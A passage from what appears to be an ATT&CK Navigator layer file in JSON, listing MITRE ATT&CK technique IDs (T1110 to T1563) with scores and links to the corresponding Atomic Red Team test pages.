atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"te
chniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T15
43.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"
techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T154
6.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://git
